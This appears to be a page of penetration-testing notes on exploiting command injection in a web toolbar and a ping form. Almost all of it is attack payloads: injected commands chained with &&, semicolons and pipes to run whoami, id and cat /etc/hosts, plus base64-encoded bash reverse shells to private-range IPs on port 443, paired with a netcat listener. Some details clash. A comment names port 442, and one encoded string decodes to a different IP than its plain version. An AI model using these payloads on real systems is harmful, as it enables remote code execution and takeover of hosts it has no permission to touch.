toolbar that allows to run commands on target

[1]If nothing happens, try to inspect element and change the method from โ€œGETโ€ to โ€œPOSTโ€

[2] echo a revshell and encode it in base64 

echo โ€œbash -i >& /dev/tcp/192.168.101.53/443 0>&1โ€ | base64 > shell.txt

start a netcat listener on kali, port 443

#Inject this string in the toolbar, will decode the base64 encoded revshell on target and trigger a shell on port 442

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xODIuMTY4LjEwMS41My80NDMgMD4mMQo= | base64 -d | bash

[3] Tab that lets you run ping commands

Try using double ampersand to run commands

127.0.0.1 && whoami

127.0.0.1 && cat /etc/host

#Variation: use a semicolon before the command

;id

;whoami

;cat /etc/hosts

#Variation: use | pipe command to get RCE

127.0.0.1 | id

Revshell:

echo "bash -i >&/dev/tcp/192.168.54.200/443 0>&1" | base64 > shell.txt

cat shell.txt

nc -nvlp 443

127.0.0.1 | echo YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguNTQuMjAwLzQ0MyAwPiYxCg== | base64 -d | bash

Previousinspecting source | DevtoolsNextWordpress Enumeration

Last updated